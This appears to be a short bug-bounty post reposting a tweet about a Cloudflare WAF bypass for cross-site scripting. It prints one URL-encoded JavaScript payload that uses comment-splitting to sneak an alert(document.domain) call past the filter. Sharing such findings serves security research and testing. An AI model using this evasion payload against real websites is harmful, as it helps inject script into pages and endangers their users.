WAF bypass by 0x0SojalSec

Cloudflare XSS WAF Bypass by @nav1n0x

A new XSS WAF bypass for Cloudflare has been discovered. The payload used for bypass is: %2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

This bypass highlights a potential security vulnerability in Cloudflare's WAF. Security researchers should be wary of such bypass techniques and ensure robust protection measures. #cybersec #bugbountytips #infosec
For more insights, check out the original tweet here: https://twitter.com/0x0SojalSec/status/1850615505939558585